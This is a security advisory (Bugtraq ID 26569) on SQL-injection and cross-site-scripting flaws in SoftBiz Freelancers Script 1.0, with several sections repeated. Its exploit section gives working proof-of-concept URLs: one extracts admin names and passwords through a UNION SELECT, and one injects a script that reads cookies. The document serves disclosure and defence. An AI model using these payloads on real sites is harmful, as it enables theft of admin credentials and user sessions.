Softbiz Freelancers Script Multiple Vulnerabilities
BID:26569
Info
Softbiz Freelancers Script Multiple Vulnerabilities
| Bugtraq ID: | 26569 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6124 CVE-2007-6125 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 25 2007 12:00AM |
| Updated: | Dec 18 2007 08:05PM |
| Credit: | IRCRASH discovered this vulnerability. |
| Vulnerable: |
SoftBiz Freelancers Script 1.0 |
| Not Vulnerable: | |
Discussion
Softbiz Freelancers Script Multiple Vulnerabilities
Softbiz Freelancers Script is prone to multiple vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting the SQL-injection issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Exploiting the cross-site scripting issue may allow the attacker to run arbitrary script code in the browser of an unsuspecting user and steal cookie-based authentication credentials.
Softbiz Freelancers Script is prone to multiple vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting the SQL-injection issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Exploiting the cross-site scripting issue may allow the attacker to run arbitrary script code in the browser of an unsuspecting user and steal cookie-based authentication credentials.
Exploit / POC
Softbiz Freelancers Script Multiple Vulnerabilities
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
For the SQL-injection issue:
http://www.example.com/search_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*
For the cross-site scripting issue:
http://www.example.com/signin.php?errmsg=<script>alert(document.cookie);</script>
The following proof-of-concept code is also available:
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
For the SQL-injection issue:
http://www.example.com/search_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*
For the cross-site scripting issue:
http://www.example.com/signin.php?errmsg=<script>alert(document.cookie);</script>
The following proof-of-concept code is also available:
Solution / Fix
Softbiz Freelancers Script Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Softbiz Freelancers Script Multiple Vulnerabilities
References:
References:
- Softbiz Freelancers Script Homepage (Softbiz)